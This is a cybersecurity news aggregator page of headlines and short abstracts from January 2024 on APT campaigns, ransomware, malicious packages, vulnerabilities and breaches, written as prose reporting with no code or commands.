A previously undocumented China-aligned threat actor has been linked to a set of adversary-in-the-middle (AitM) attacks that hijack update requests from legitimate software to deliver a sophisticated implant named NSPX30. Slovak cybersecurity firm ESET is tracking the advanced persistent threat (APT) group under the name Blackwood . It's said to be active since at least 2018. The NSPX30 implant has been observed deployed via the update mechanisms of known software such as Tencent QQ, WPS Office, and Sogou Pinyin, with the attacks targeting Chinese and Japanese manufacturing, trading, and engineering companies as well as individuals located in China, Japan, and the U.K. "NSPX30 is a multistage implant that includes several components such as a dropper, an installer, loaders, an orchestrator, and a backdoor," security researcher Facundo Muñoz said . "Both of the latter two have their own sets of plugins." "The implant was designed around the attackers

The Hacker News

January 25, 2024 – Attack

Ukrainian Hackers Claim Attack on Russian Scientific Research Center Full Text

Abstract

The Ukrainian hacker group "BO Team" reportedly breached a Russian scientific research center, destroying its database and equipment. The target, the State Research Center on Space Hydrometeorology, is a key enterprise for processing satellite data.

Cyware

January 25, 2024 – Attack

New CherryLoader Malware Mimics CherryTree to Deploy PrivEsc Exploits Full Text

Abstract

A new Go-based malware loader called CherryLoader has been discovered by threat hunters in the wild to deliver additional payloads onto compromised hosts for follow-on exploitation. Arctic Wolf Labs, which discovered the new attack tool in two recent intrusions, said the loader's icon and name masquerades as the legitimate CherryTree note-taking application to dupe potential victims into installing it. "CherryLoader was used to drop one of two privilege escalation tools, PrintSpoofer or JuicyPotatoNG , which would then run a batch file to establish persistence on the victim device," researchers Hady Azzam, Christopher Prest, and Steven Campbell said . In another novel twist, CherryLoader also packs modularized features that allow the threat actor to swap exploits without recompiling code. It's currently not known how the loader is distributed, but the attack chains examined by the cybersecurity firm show that CherryLoader ("cherrytree.exe") and i

The Hacker News

January 25, 2024 – Policy and Law

French Regulators Levy $34.7 Million Fine Against Amazon for Surveilling Employees Full Text

Abstract

France's data protection authority, CNIL, has fined Amazon €32 million ($34.7 million) for excessive monitoring of employees in its warehouses and for not promptly deleting the data.

Cyware

January 25, 2024 – Attack

Tech Giant HP Enterprise Hacked by Russian Hackers Linked to DNC Breach Full Text

Abstract

Hackers with links to the Kremlin are suspected to have infiltrated information technology company Hewlett Packard Enterprise's (HPE) cloud email environment to exfiltrate mailbox data. "The threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions," the company said in a regulatory filing with the U.S. Securities and Exchange Commission (SEC). The intrusion has been attributed to the Russian state-sponsored group known as APT29, and which is also tracked under the monikers BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. The disclosure arrives days after Microsoft implicated the same threat actor to the breach of its corporate systems in late November 2023 to steal emails and attachments from senior executives and other individuals in the company's cybersecurity and legal d

The Hacker News

January 25, 2024 – General

The Effect of Omission Bias on Vulnerability Management Full Text

Abstract

Omission bias in vulnerability management leads to the reluctance to patch vulnerabilities, despite evidence showing the importance of timely patching to prevent cyberattacks.

Cyware

January 25, 2024 – Government

UK Tells Business Leaders to ‘Toughen Up’ Against Cyberattacks Full Text

Abstract

The increase in ransomware attacks in the UK is attributed to the success of the ransomware-as-a-service ecosystem, making it easier for criminals to engage in disruptive attacks.

Cyware

January 25, 2024 – Vulnerabilities

Security Vendors are Accused of Bending CVE Assignment Rules Full Text

Abstract

Both Juniper Networks and Ivanti have attracted criticism from members of the infosec industry for the way they've handled the disclosure of vulnerabilities over the past week.

Cyware

January 25, 2024 – Breach

Data from Indian Online Gaming Platforms Teenpatti.com and Mpl.live on Sale Full Text

Abstract

The alleged data breach at Teenpatti.com and Mpl.live underscores the urgent need for improved security measures in online gaming platforms, especially in handling large volumes of personal user data.

Cyware

January 25, 2024 – Malware

Unmasking MacOS Malware in Pirated Apps Full Text

Abstract

Pirate applications targeting macOS users distribute a backdoor, allowing attackers to download and execute multiple payloads. Each application includes a malicious dylib, a backdoor, and a persistent downloader, posing a significant threat to users. The researchers from Jamf Threat Labs identified ... Read More

Cyware

January 24, 2024 – Vulnerabilities

Google Kubernetes Misconfig Lets Any Gmail Account Control Your Clusters Full Text

Abstract

Cybersecurity researchers have discovered a loophole impacting Google Kubernetes Engine (GKE) that could be potentially exploited by threat actors with a Google account to take control of a Kubernetes cluster. The critical shortcoming has been codenamed Sys:All by cloud security firm Orca. As many as 250,000 active GKE clusters in the wild are estimated to be susceptible to the attack vector. In a report shared with The Hacker News, security researcher Ofir Yakobi said it "stems from a likely widespread misconception that the system:authenticated group in Google Kubernetes Engine includes only verified and deterministic identities, whereas in fact, it includes any Google authenticated account (even outside the organization)." The system:authenticated group is a special group that includes all authenticated entities, counting human users and service accounts. As a result, this could have serious consequences when administrators inadvertently bestow it with overly permi

The Hacker News

January 24, 2024 – Solution

What is Nudge Security and How Does it Work? Full Text

Abstract

In today's highly distributed workplace, every employee has the ability to act as their own CIO, adopting new cloud and SaaS technologies whenever and wherever they need. While this has been a critical boon to productivity and innovation in the digital enterprise, it has upended traditional approaches to IT security and governance. Nudge Security is the world's first and only solution to address SaaS security and governance at scale by working with employees—not against them. Unlike legacy solutions that attempt to block employees' access to unsanctioned SaaS applications, Nudge Security helps IT and security leaders adapt and align to the needs of the business. The platform orchestrates SaaS administration without sacrificing visibility, centralized governance, or control over the organization's cloud and SaaS security posture. How Nudge Security works Nudge Security discovers all SaaS accounts ever created by anyone in your organization within minutes of starting a free

The Hacker News

January 24, 2024 – Ransomware

Kasseika Ransomware Using BYOVD Trick to Disarm Security Pre-Encryption Full Text

Abstract

The ransomware group known as Kasseika has become the latest to leverage the Bring Your Own Vulnerable Driver ( BYOVD ) attack to disarm security-related processes on compromised Windows hosts, joining the likes of other groups like Akira , AvosLocker, BlackByte, and RobbinHood . The tactic allows "threat actors to terminate antivirus processes and services for the deployment of ransomware," Trend Micro said in a Tuesday analysis. Kasseika, first discovered by the cybersecurity firm in mid-December 2023, exhibits overlaps with the now-defunct BlackMatter , which emerged in the aftermath of DarkSide's shutdown. There is evidence to suggest that the ransomware strain could be the handiwork of an experienced threat actor that acquired or purchased access to BlackMatter, given that the latter's source code has never publicly leaked post its demise in November 2021. Attack chains involving Kasseika commence with a phishing email for initial access, subsequently

The Hacker News

January 23, 2024 – Attack

Black Basta Gang Claims the Hack of the UK Water Utility Southern Water Full Text

Abstract

The Black Basta ransomware gang targeted the UK water utility Southern Water, threatening to leak 750 gigabytes of stolen sensitive data, including personal and corporate documents.

Cyware

January 23, 2024 – Criminals

VexTrio: The Uber of Cybercrime - Brokering Malware for 60+ Affiliates Full Text

Abstract

The threat actors behind ClearFake, SocGholish, and dozens of other actors have established partnerships with another entity known as VexTrio as part of a massive "criminal affiliate program," new findings from Infoblox reveal. The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said , describing VexTrio as the "single largest malicious traffic broker described in security literature." VexTrio, which is believed to be have been active since at least 2017, has been attributed to malicious campaigns that use domains generated by a dictionary domain generation algorithm ( DDGA ) to propagate scams, riskware, spyware, adware, potentially unwanted programs (PUPs), and pornographic content. This includes a 2022 activity cluster that distributed the Glupteba malware following an earlier attempt by Google to take down a significant chunk of its infrastructure in

The Hacker News

January 23, 2024 – Breach

Slug Ransomware Attacked AerCap, Claims to Have Stolen 1TB Data Full Text

Abstract

AerCap, the world's largest aircraft leasing company, reported a ransomware infection. However, it claims to have not suffered financial losses and has control over its systems.

Cyware

January 23, 2024 – Malware

Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub Full Text

Abstract

Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed. The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024. Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k. Both the modules are designed to run a postinstall script after installation, each capable of retrieving and executing a different JavaScript file. While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named "meow," raising the possibility that the threat actor likely used a placeholder name during the early stages of the development.

The Hacker News

January 23, 2024 – Ransomware

Threat Assessment of BianLian Ransomware Full Text

Abstract

The BianLian ransomware group has shifted from a double extortion scheme to a focus on extortion without encryption, posing a significant threat to organizations, particularly in the healthcare and manufacturing sectors in the US and Europe.

Cyware

January 23, 2024 – Malware

“Activator” Alert: MacOS Malware Hides in Cracked Apps, Targeting Crypto Wallets Full Text

Abstract

Cracked software have been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and Apple silicon processor architectures. The attack chains leverage booby-trapped disk image (DMG) files that include a program named "Activator" and a pirated version of legitimate software such as xScope. Users who end up opening the DMG files are urged to move both files to the Applications folder and run the Activator component to apply a supposed patch and run the xScope app. Launching Activator, however, displays a prompt asking the victim to enter the system administrator password, thereby allowing it to execute a Mach-O binary with elevated permissions in order to launch the modif

The Hacker News

January 23, 2024 – Breach

Update: LoanDepot Says 16.6 Million Customers had ‘Sensitive Personal’ Information Stolen in Cyberattack Full Text

Abstract

The company is working to restore normal business operations, but many online services remain inaccessible even after two weeks. It is still uncertain whether the cyber incident will have a significant impact on LoanDepot's financial condition.

Cyware

January 23, 2024 – Denial Of Service

From Megabits to Terabits: Gcore Radar Warns of a New Era of DDoS Attacks Full Text

Abstract

As we enter 2024, Gcore has released its latest Gcore Radar report, a twice-annual publication in which the company releases internal analytics to track DDoS attacks. Gcore's broad, internationally distributed network of scrubbing centers allows them to follow attack trends over time. Read on to learn about DDoS attack trends for Q3–Q4 of 2023, and what they mean for developing a robust protection strategy in 2024. Gcore's Key Findings DDoS attack trends for the second half of 2023 reveal alarming developments in the scale and sophistication of cyberthreats. Unprecedented Attack Power The past three years have brought about a >100% annual increase in DDoS peak (registered maximum) attack volume: In 2021, the peak capacity of DDoS attacks was 300 Gbps In 2022, it increased to 650 Gbps In Q1–Q2 of 2023, it increased again to 800 Gbps In Q3–Q4 of 2023, it surged to 1600 Gbps (1.6 Tbps) Notably, the jump in H2 of 2023 means the cybersecurity industry is measuring DDoS a

The Hacker News

January 23, 2024 – Hacker

North Korean ScarCruft Attackers Gear Up to Target Cybersecurity Professionals Full Text

Abstract

The group is testing innovative infection routines that use technical threat research on another North Korean APT group, Kimsuky, as a lure, indicating a new approach to their cyberattacks.

Cyware

January 23, 2024 – Policy and Law

BreachForums Founder Sentenced to 20 Years of Supervised Release, No Jail Time Full Text

Abstract

Conor Brian Fitzpatrick has been sentenced to time served and 20 years of supervised release for his role as the creator and administrator of BreachForums. Fitzpatrick, who went by the online alias "pompompurin," was arrested in March 2023 in New York and was subsequently charged with conspiracy to commit access device fraud and possession of child pornography. He was later released on a $300,000 bond, and in July 2023, he pleaded guilty to the charges. BreachForums was a major cyber crime marketplace that facilitated the trafficking of stolen data since March 2022. Prior to its shutdown exactly a year later, the website boasted of over 340,000 members. Among the stolen items commonly sold on the platform were bank account information, Social Security numbers, personally identifying information (PII), hacking tools, breached databases, and account login information for compromised online accounts with service providers and merchants. BreachForums also advertised servic

The Hacker News

January 23, 2024 – Solution

New Method To Safeguard Against Mobile Account Takeovers Full Text

Abstract

The method involves modeling how account access changes as devices, SIM cards, or apps are disconnected from the account ecosystem, providing insights into complex hacking attacks.

Cyware

January 23, 2024 – Vulnerabilities

~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation Full Text

Abstract

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations. The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5. But merely days after the flaw became public knowledge, nearly 40,000 exploitation attempts targeting CVE-2023-22527 have been recorded in the wild as early as January 19 from more than 600 unique IP addresses, according to both the Shadowserver Foundation and the DFIR Report . The activity is currently limited "testing callback attempts and 'whoami' execution," suggesting that threat actors are opportunistically scanning for vulnerable servers

The Hacker News

January 23, 2024 – General

Historic Data Leak Reveals 26 Billion Records From Tencent, Weibo, Twitter, Adobe, and Others Full Text

Abstract

The leaked information spans across various companies, organizations, and government agencies globally. The potential impact on consumers is significant, as the leaked data could be used for credential-stuffing attacks and spear-phishing.

Cyware

January 20, 2024 – Hacker

Chinese Hackers Silently Weaponized VMware Zero-Day Flaw for 2 Years Full Text

Abstract

An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been attributed to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021. "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities," Google-owned Mandiant said in a Friday report. The vulnerability in question is CVE-2023-34048 (CVSS score: 9.8), an out-of-bounds write that could be put to use by a malicious actor with network access to vCenter Server to achieve remote code execution. It was fixed by the Broadcom-owned company on October 24, 2023. The virtualization services provider, earlier this week, updated its advisory to acknowledge that "exploitation of CVE-2023-34048 has occurred in the wild." UNC3886 first came to light in September 2022 when it was

The Hacker News

January 20, 2024 – APT

China-linked APT UNC3886 Exploits VMware Zero-Day Since 2021 Full Text

Abstract

Mandiant researchers observed UNC3886 exploiting a VMware ESXi zero-day vulnerability in June 2023, using novel malware persistence techniques to achieve administrative access within VMware ESXi Hypervisors.

Cyware

January 20, 2024 – Government

CISA Issues Emergency Directive to Federal Agencies on Ivanti Zero-Day Exploits Full Text

Abstract

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products. The development came after the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – came under widespread exploitation of vulnerabilities by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system. The U.S. company acknowledged in an advisory that it has witnessed a "sharp increase in threat actor activity" starting on January 11, 2024, after the shortcomings were publicly disclosed. "Successful exploitation of the vulnerabilities in these affected products allows a malicious threat actor to move laterally, perform data exfiltration, and

The Hacker News

January 20, 2024 – Breach

Microsoft’s Top Execs’ Emails Breached in Sophisticated Russia-Linked APT Attack Full Text

Abstract

Microsoft on Friday revealed that it was the target of a nation-state attack on its corporate systems that resulted in the theft of emails and attachments from senior executives and other individuals in the company's cybersecurity and legal departments. The Windows maker attributed the attack to a Russian advanced persistent threat (APT) group it tracks as Midnight Blizzard (formerly Nobelium), which is also known as APT29, BlueBravo, Cloaked Ursa, Cozy Bear, and The Dukes. It further said that it immediately took steps to investigate, disrupt, and mitigate the malicious activity upon discovery on January 12, 2024. The campaign is estimated to have commenced in late November 2023. "The threat actor used a password spray attack to compromise a legacy non-production test tenant account and gain a foothold, and then used the account's permissions to access a very small percentage of Microsoft corporate email accounts, including members of our senior leadership team a

The Hacker News

January 20, 2024 – Phishing

Invoice Phishing Alert: TA866 Deploys WasabiSeed & Screenshotter Malware Full Text

Abstract

The threat actor tracked as TA866 has resurfaced after a nine-month hiatus with a new large-volume phishing campaign to deliver known malware families such as WasabiSeed and Screenshotter. The campaign, observed earlier this month and blocked by Proofpoint on January 11, 2024, involved sending thousands of invoice-themed emails targeting North America bearing decoy PDF files. "The PDFs contained OneDrive URLs that, if clicked, initiated a multi-step infection chain eventually leading to the malware payload, a variant of the WasabiSeed and Screenshotter custom toolset," the enterprise security firm said . TA866 was first documented by the company in February 2023, attributing it to a campaign named Screentime that distributed WasabiSeed, a Visual Basic script dropper that's used to download Screenshotter, which is capable of taking screenshots of the victim's desktop at regular intervals of time and exfiltrating that data to an actor-controlled domain. There

The Hacker News

January 19, 2024 – Outage

Update: LoanDepot Outage Drags Into Second Week After Ransomware Attack Full Text

Abstract

The mortgage and loan company LoanDepot experienced a suspected ransomware attack, leading to difficulties for customers in making mortgage payments and accessing their online accounts.

Cyware

January 19, 2024 – Criminals

PolyCrypt Runtime Crypter Being Sold on Cybercrime Forums Full Text

Abstract

The underground market for crypters, exemplified by PolyCrypt, facilitates the sale and use of these tools for malicious purposes, highlighting the ongoing challenge of cybercrime.

Cyware

January 19, 2024 – Breach

Update: Vans, Supreme Owner VF Corp Says Hackers Stole 35 Million Customers’ Personal Data Full Text

Abstract

The clothing company has not specified the type of data stolen but assured that Social Security numbers, bank account information, and payment card details were not retained.

Cyware

January 19, 2024 – Malware

Experts Warn of macOS Backdoor Hidden in Pirated Versions of Popular Software Full Text

Abstract

Pirated applications targeting Apple macOS users have been observed containing a backdoor capable of granting attackers remote control to infected machines. "These applications are being hosted on Chinese pirating websites in order to gain victims," Jamf Threat Labs researchers Ferdous Saljooki and Jaron Bradley said . "Once detonated, the malware will download and execute multiple payloads in the background in order to secretly compromise the victim's machine." The backdoored disk image (DMG) files, which have been modified to establish communications with actor-controlled infrastructure, include legitimate software like Navicat Premium, UltraEdit, FinalShell, SecureCRT, and Microsoft Remote Desktop. The unsigned applications, besides being hosted on a Chinese website named macyy[.]cn, incorporate a dropper component called "dylib" that's executed every time the application is opened. The dropper then acts as a conduit to fetch a backdoor

The Hacker News

January 19, 2024 – Education

Preventing Data Loss: Backup and Recovery Strategies for Exchange Server Administrators Full Text

Abstract

In the current digital landscape, data has emerged as a crucial asset for organizations, akin to currency. It's the lifeblood of any organization in today's interconnected and digital world. Thus, safeguarding the data is of paramount importance. Its importance is magnified in on-premises Exchange Server environments where vital business communication and emails are stored and managed. In this article, you will learn about the evolving threats of data loss, the shift in responsibilities of administrators, and key backup and recovery strategies for preventing data loss in the Exchange Server environment. Data Loss Scenarios in Exchange Servers Data loss in on-premises Exchange Server environment has become increasingly common. Cybersecurity threats, like ransomware attacks, have emerged as a significant cause of data loss in recent years, with many financially motivated threat actors increasingly targeting the vulnerabilities in Exchange Servers. These attackers try to exploit

The Hacker News

January 19, 2024 – Malware

Npm Trojan Bypasses UAC, Installs AnyDesk with “Oscompatible” Package Full Text

Abstract

A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines. The package, named " oscompatible ," was published on January 9, 2024, attracting a total of 380 downloads before it was taken down. oscompatible included a "few strange binaries," according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file. This JavaScript file ("index.js") executes an "autorun.bat" batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows. If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on "Windows Server OS." The batch script, for its part, verifies if it has admin privil

The Hacker News

January 18, 2024 – Botnet

Malicious Extortion Bot Targets Publicly Exposed PostgreSQL and MySQL Databases Full Text

Abstract

The bot gains access to the databases, deletes all tables and databases, and leaves a ransom note demanding payment for data recovery. However, the bot only saves a small portion of the data, even if the ransom is paid.

Cyware

January 18, 2024 – Malware

New Docker Malware Steals CPU for Crypto & Drives Fake Website Traffic Full Text

Abstract

Vulnerable Docker services are being targeted by a novel campaign in which the threat actors are deploying XMRig cryptocurrency miner as well as the 9Hits Viewer software as part of a multi-pronged monetization strategy. "This is the first documented case of malware deploying the 9Hits application as a payload," cloud security firm Cado said , adding the development is a sign that adversaries are always on the lookout for diversifying their strategies to make money off compromised hosts. 9Hits advertises itself as a "unique web traffic solution" and an "automatic traffic exchange" that allows members of the service to drive traffic to their sites in exchange for purchasing credits. This is accomplished by means of a software called 9Hits Viewer, which runs a headless Chrome browser instance to visit websites requested by other members, for which they earn credits to pay for generating traffic to their sites. The exact method used to spread the malwa

The Hacker News

January 18, 2024 – Phishing

TA866 Returns with a Large Email Campaign Full Text

Abstract

The new campaign by TA866 involved a large volume of emails with attached PDFs containing OneDrive URLs that initiated a multi-step infection chain leading to malware payload.

Cyware

January 18, 2024 – Phishing

Russian COLDRIVER Hackers Expand Beyond Phishing with Custom Malware Full Text

Abstract

The Russia-linked threat actor known as COLDRIVER has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language. Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are sent from impersonation accounts. COLDRIVER, also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Gossamer Bear, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057, is known to be active since 2019, targeting a wide range of sectors. This includes academia, defense, governmental organizations, NGOs, think tanks, political outfits, and, recently, defense-industrial targets and energy facilities. "Targets in the U.K. and U.S. appear to have been most affected by Star Blizzard activity, however activity has also been observe

The Hacker News

January 18, 2024 – Malware

Malware Exploiting 9Hits, Turns Docker Servers into Crypto Miners Full Text

Abstract

Attackers are using off-the-shelf images from Dockerhub to spread malware, with the 9Hits app visiting various websites and the XMRig miner disabled from visiting crypto-related sites to prevent analysis.

Cyware

January 18, 2024 – Vulnerabilities

TensorFlow CI/CD Flaw Exposed Supply Chain to Poisoning Attacks Full Text

Abstract

Continuous integration and continuous delivery (CI/CD) misconfigurations discovered in the open-source TensorFlow machine learning framework could have been exploited to orchestrate supply chain attacks . The misconfigurations could be abused by an attacker to "conduct a supply chain compromise of TensorFlow releases on GitHub and PyPi by compromising TensorFlow's build agents via a malicious pull request," Praetorian researchers Adnan Khan and John Stawinski said in a report published this week. Successful exploitation of these issues could permit an external attacker to upload malicious releases to the GitHub repository, gain remote code execution on the self-hosted GitHub runner, and even retrieve a GitHub Personal Access Token (PAT) for the tensorflow-jenkins user . TensorFlow uses GitHub Actions to automate the software build, test, and deployment pipeline. Runners, which refer to machines that execute jobs in a GitHub Actions workflow, can be either self-

The Hacker News

January 18, 2024 – Vulnerabilities

Apple, AMD, Qualcomm, Imagination GPUs Open to Data Theft Using New LeftoverLocals Vulnerability Full Text

Abstract

The vulnerability affects various GPU products, with AMD and Apple planning mitigations, and Imagination and Qualcomm issuing fixes. Nvidia and Arm are reportedly unaffected.

Cyware

January 18, 2024 – Education

MFA Spamming and Fatigue: When Security Measures Go Wrong Full Text

Abstract

In today's digital landscape, traditional password-only authentication systems have proven to be vulnerable to a wide range of cyberattacks. To safeguard critical business resources, organizations are increasingly turning to multi-factor authentication (MFA) as a more robust security measure. MFA requires users to provide multiple authentication factors to verify their identity, providing an additional layer of protection against unauthorized access. However, cybercriminals are relentless in their pursuit of finding ways to bypass MFA systems . One such method gaining traction is MFA spamming attacks, also known as MFA fatigue, or MFA bombing . This article delves into MFA spamming attacks, including the best practices to mitigate this growing threat. What is MFA spamming? MFA spamming refers to the malicious act of inundating a target user's email, phone, or other registered devices with numerous MFA prompts or confirmation codes. The objective behind this tactic is to o

The Hacker News

January 18, 2024 – Disinformation

OpenAI Combats Election Misinformation Amid Growing Concerns Full Text

Abstract

OpenAI is taking steps to prevent the use of ChatGPT in spreading election misinformation, including restricting its use for political campaigning and lobbying, and creating tools to empower voters to assess the authenticity of images.

Cyware

January 18, 2024 – Vulnerabilities

PixieFail UEFI Flaws Expose Millions of Computers to RCE, DoS, and Data Theft Full Text

Abstract

Multiple security vulnerabilities have been disclosed in the TCP/IP network protocol stack of an open-source reference implementation of the Unified Extensible Firmware Interface ( UEFI ) specification used widely in modern computers. Collectively dubbed PixieFail by Quarkslab, the nine issues reside in the TianoCore EFI Development Kit II ( EDK II ) and could be exploited to achieve remote code execution, denial-of-service (DoS), DNS cache poisoning, and leakage of sensitive information. UEFI firmware – which is responsible for booting the operating system – from AMI, Intel, Insyde, and Phoenix Technologies are impacted by the shortcomings. EDK II incorporates its own TCP/IP stack called NetworkPkg to enable network functionalities available during the initial Preboot eXecution Environment ( PXE , pronounced "pixie") stage, which allows for management tasks in the absence of a running operating system. In other words, it is a client-server interface to boot a

The Hacker News

January 18, 2024 – Attack

Pro-Russia Group Hit Swiss Government Sites After Zelensky Visit in Davos Full Text

Abstract

Switzerland's National Cyber Security Centre promptly detected and responded to the DDoS attacks, restoring access to the targeted websites, including the Davos-Klosters ski resort and Swiss Ministry of the Interior.

Cyware

January 18, 2024 – Phishing

Iranian Hackers Masquerade as Journalists to Spy on Israel-Hamas War Experts Full Text

Abstract

High-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the U.K., and the U.S. have been targeted by an Iranian cyber espionage group called Mint Sandstorm since November 2023. The threat actor "used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files," the Microsoft Threat Intelligence team said in a Wednesday analysis, describing it as a "technically and operationally mature subgroup of Mint Sandstorm." The attacks, in select cases, involve the use of a previously undocumented backdoor dubbed MediaPl, indicating ongoing endeavors by Iranian threat actors to refine their post-intrusion tradecraft. Mint Sandstorm, also known as APT35, Charming Kitten, TA453, and Yellow Garuda, is known for its adept social engineering campaigns , even resorting to legitimate but compromised accounts to send bespoke phishing emails to prospective

The Hacker News

January 18, 2024 – General

As Hacks Worsen, SEC Turns up the Heat on CISOs Full Text

Abstract

The cybersecurity industry is facing increasing legal oversight and consequences, making it riskier to work in this field. Companies are now required to disclose "material" security incidents within four working days to the SEC.

Cyware

January 18, 2024 – Attack

Taiwanese Semiconductor Company Foxsemicon Suffers Ransomware Attack Full Text

Abstract

Foxsemicon, a major semiconductor manufacturer in Taiwan, was targeted by the LockBit ransomware gang, who threatened to leak customers' personal data if a ransom was not paid.

Cyware

January 17, 2024 – Vulnerabilities

Vulnerabilities Discovered in Android-based POS Terminals From PAX Technology Full Text

Abstract

The PoS terminals from PAX Technology, based on Android, are found to have several vulnerabilities that can be exploited to execute arbitrary code or commands, according to a report by STM Cyber.

Cyware

January 17, 2024 – Vulnerabilities

PAX PoS Terminal Flaw Could Allow Attackers to Tamper with Transactions Full Text

Abstract

The point-of-sale (PoS) terminals from PAX Technology are impacted by a collection of high-severity vulnerabilities that can be weaponized by threat actors to execute arbitrary code. The STM Cyber R&D team, which reverse engineered the Android-based devices manufactured by the Chinese firm owing to their rapid deployment in Poland, said it unearthed half a dozen flaws that allow for privilege escalation and local code execution from the bootloader. Details about one of the vulnerabilities (CVE-2023-42133) have been currently withheld. The other flaws are listed below - CVE-2023-42134 & CVE-2023-42135 (CVSS score: 7.6) - Local code execution as root via kernel parameter injection in fastboot (Impacts PAX A920Pro/PAX A50) CVE-2023-42136 (CVSS score: 8.8) - Privilege escalation from any user/application to system user via shell injection binder-exposed service (Impacts All Android-based PAX PoS devices) CVE-2023-42137 (CVSS score: 8.8) - Privilege escalation from

The Hacker News

January 17, 2024 – Criminals

Detained Russian Student Allegedly Helped Ukrainian Hackers With Cyberattacks Full Text

Abstract

A Russian tech student faces treason charges for allegedly helping Ukrainian hackers carry out cyberattacks against Russia, revealing the ongoing cyberwar between the two countries.

Cyware

January 17, 2024 – Solution

Combating IP Leaks into AI Applications with Free Discovery and Risk Reduction Automation Full Text

Abstract

Wing Security announced today that it now offers free discovery and a paid tier for automated control over thousands of AI and AI-powered SaaS applications. This will allow companies to better protect their intellectual property (IP) and data against the growing and evolving risks of AI usage. SaaS applications seem to be multiplying by the day, and so does their integration of AI capabilities. According to Wing Security, a SaaS security company that researched over 320 companies, a staggering 83.2% use GenAI applications. While this statistic might not come as a surprise, the research showed that 99.7% of organizations use SaaS applications that leverage AI capabilities to deliver their services. This usage of GenAI in SaaS applications that are not 'pure' AI often goes unnoticed by security teams and users alike. 70% of the most popular GenAI applications may use your data to train their models, and in many cases it's completely up to you to configure it differently

The Hacker News

January 17, 2024 – Business

Cyber Startup Vicarius Raises $30 Million Series B for Vulnerability Remediation Platform Full Text

Abstract

The Israeli startup has secured a $30 million Series B funding led by Bright Pixel Capital. The company's total funding now exceeds $56 million, with participation from other investors such as JVP, AllegisCyber Capital, AlleyCorp, and Strait Capital.

Cyware

January 17, 2024 – Government

Feds Warn of AndroxGh0st Botnet Targeting AWS, Azure, and Office 365 Credentials Full Text

Abstract

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) warned that threat actors deploying the AndroxGh0st malware are creating a botnet for "victim identification and exploitation in target networks." A Python-based malware, AndroxGh0st was first documented by Lacework in December 2022, with the malware inspiring several similar tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator. The cloud attack tool is capable of infiltrating servers vulnerable to known security flaws to access Laravel environment files and steal credentials for high-profile applications such as Amazon Web Services (AWS), Microsoft Office 365, SendGrid, and Twilio. Some of the notable flaws weaponized by the attackers include CVE-2017-9841 (PHPUnit), CVE-2021-41773 (Apache HTTP Server), and CVE-2018-15133 (Laravel Framework). "AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitat

The Hacker News

January 17, 2024 – Phishing

Cheap .cloud Domains and Shark Tank Impersonation Fuels Unhealthy Scams Full Text

Abstract

Scammers are using fake news campaigns and cheaply acquired domain names to sell dubious health products, often claiming endorsements from popular entrepreneurial reality shows like Shark Tank and Dragons' Den.

Cyware

January 17, 2024 – Education

Webinar: The Art of Privilege Escalation - How Hackers Become Admins Full Text

Abstract

In the digital age, the battleground for security professionals is not only evolving, it's expanding at an alarming rate. The upcoming webinar, " The Art of Privilege Escalation - How Hackers Become Admins ," offers an unmissable opportunity for IT security experts to stay ahead in this relentless cyber war. Privilege escalation - the term might sound benign, but in the hands of a skilled hacker, it's a devastating tactic. It's a method where cyber attackers, starting as standard users, clandestinely climb the ladder of access, eventually gaining root-level control. This isn't just a breach; it's a systematic takeover of your entire network. Picture a scenario where cybercriminals roam freely through your network, turning your layers of defense into mere spectators. It's a chilling thought, but it's a reality faced by organizations across the globe. What if you could anticipate and counter these threats? Expertly delivered by Joseph Carson , Ch

The Hacker News

January 17, 2024 – Breach

